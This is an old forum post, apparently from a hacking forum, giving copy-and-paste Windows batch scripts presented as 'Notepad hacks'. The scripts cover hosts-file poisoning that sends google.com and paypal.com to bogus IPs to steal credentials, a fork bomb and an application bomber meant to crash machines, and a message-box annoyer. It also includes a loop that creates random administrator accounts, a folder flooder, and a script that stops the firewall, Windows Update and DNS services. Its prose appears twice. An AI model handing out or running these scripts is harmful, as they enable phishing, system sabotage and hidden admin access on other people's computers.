[[Notepad Tricks/Hacks]] 04-16-2012, 02:04 PM
#1
DNS Poisining:
Batch file can has the tendency to modify the transfer zones by editing the hosts.txt file that
resides inside ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it will take you to some malicious
websites instead of landing you to the legitimate website. This may also be used for phishing, i.e.
redirecting you to a bogus website which looks exactly like the legitimate one, and then steal credentials.
Just Create A Notepad And Copy This Code And Paste Into Notepad
Now Click On File>Save As And Rename The File anyname.bat
This program creates a new entry in the hosts file, so that whenever an user attempts to move to
http://www.google.com, he will be re-directed to another host that has the IP address of 10.199.64.66, likewise
if the user attempts to login to the paypal account by typing in http://www.paypal.com, he will be re-directed to
another external bogus website that has the IP address of 10.199.64.67, where if the user enters the
credentials unknowingly, they were into the hackers database and he can use it for several other purposes.
Fork Bombing:
Most of them have heard about the word ‘fork()’, which is used to create child process, like wise
fork bombing is nothing but calling a program by itself again and again with a infinite loop and making
the system to crash by popping up hundreds of windows on the screen.
Copy the above program and paste it in a notepad file and save it as ‘fork.bat’. The explorer
command will open up the ‘documents’ directory, and it is given inside a loop, then the same batch file is
called again which in turn opens up multiple documents rolled out in a loop, likewise it goes on by calling
the program itself again and again until the system crashes or hangs up.
Application Bomber:
Application bomber is a superset of window bomber, this has a close relation to the above given
fork bomber program, where in this ‘application bomber’ we don’t call the program using the name itself
(simply known as fork), where as we are going to open up applications continuously using a loop.
When the above given batch program is executed, it will open up the following applications such
as notepad, word document, Microsoft paint, WordPad, command prompt, my documents, control panel,
and calculator in an infinite loop causing the system to collapse and as a result the system simply crashes
or reboots. Just imagine the same using a fork concept; oops! it will make the system crash immediately.
Msg Annoyer:
Message annoyer is a batch program that uses the same concept as above, but will interact with
the user anyhow annoying and irritating them by popping up some message box containing some
messages in it.
You Can Change Msg To Any MAssage You Want
User Flooder:
The ‘user flooder’ program will create a number of user accounts with random numbers, and
assign administrator rights to them by itself, moreover the password set for those user accounts were too
random numbers
Matrix Folder flooder:
The following piece of code is going to help flood you computer with junky folders. This
program has the tendency to create more than 3000 folders in just less than a minute.
Service Disabler:
The following piece of code is used for stopping some critical windows services.
Batch file can has the tendency to modify the transfer zones by editing the hosts.txt file that
resides inside ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it will take you to some malicious
websites instead of landing you to the legitimate website. This may also be used for phishing, i.e.
redirecting you to a bogus website which looks exactly like the legitimate one, and then steal credentials.
Just Create A Notepad And Copy This Code And Paste Into Notepad
Code:
@echo off
echo 10.199.64.66 http://www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 10.199.64.67 http://www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt
exitNow Click On File>Save As And Rename The File anyname.bat
This program creates a new entry in the hosts file, so that whenever an user attempts to move to
http://www.google.com, he will be re-directed to another host that has the IP address of 10.199.64.66, likewise
if the user attempts to login to the paypal account by typing in http://www.paypal.com, he will be re-directed to
another external bogus website that has the IP address of 10.199.64.67, where if the user enters the
credentials unknowingly, they were into the hackers database and he can use it for several other purposes.
Fork Bombing:
Most of them have heard about the word ‘fork()’, which is used to create child process, like wise
fork bombing is nothing but calling a program by itself again and again with a infinite loop and making
the system to crash by popping up hundreds of windows on the screen.
Code:
@echo off
:loop
Explorer
Call fork.bat
Goto loopCopy the above program and paste it in a notepad file and save it as ‘fork.bat’. The explorer
command will open up the ‘documents’ directory, and it is given inside a loop, then the same batch file is
called again which in turn opens up multiple documents rolled out in a loop, likewise it goes on by calling
the program itself again and again until the system crashes or hangs up.
Application Bomber:
Application bomber is a superset of window bomber, this has a close relation to the above given
fork bomber program, where in this ‘application bomber’ we don’t call the program using the name itself
(simply known as fork), where as we are going to open up applications continuously using a loop.
Code:
@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loopWhen the above given batch program is executed, it will open up the following applications such
as notepad, word document, Microsoft paint, WordPad, command prompt, my documents, control panel,
and calculator in an infinite loop causing the system to collapse and as a result the system simply crashes
or reboots. Just imagine the same using a fork concept; oops! it will make the system crash immediately.
Msg Annoyer:
Message annoyer is a batch program that uses the same concept as above, but will interact with
the user anyhow annoying and irritating them by popping up some message box containing some
messages in it.
Code:
@echo off
:annoy
msg * Hi Hustlers
msg * How Are You Awll
msg * Are you fine ?
msg * Thanks For Reading My Thread.
msg * I Am Not Here To Annoy You Awll....
msg * I Am Caring For You....
msg * start counting from 1 to 5, i Will be outta this place.....
msg * 1
msg * 2
msg * 3
msg * 4
msg * 5
goto annoyYou Can Change Msg To Any MAssage You Want
User Flooder:
The ‘user flooder’ program will create a number of user accounts with random numbers, and
assign administrator rights to them by itself, moreover the password set for those user accounts were too
random numbers
Code:
@echo off
:usrflood
set usr=%random%
net users %usr% %random% /add
net localgroup administrators %usr% /add
goto usrfloodMatrix Folder flooder:
The following piece of code is going to help flood you computer with junky folders. This
program has the tendency to create more than 3000 folders in just less than a minute.
Code:
@echo off
:loop
mkdir %random%
goto loopService Disabler:
The following piece of code is used for stopping some critical windows services.
Code:
@echo off
net stop "Windows Firewall"
net stop "Windows Update"
net stop Workstation
net stop "DHCP Client"
net stop "DNS Client"
net stop "Print Spooler"
net stop Themes
exit
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
Check All The Letters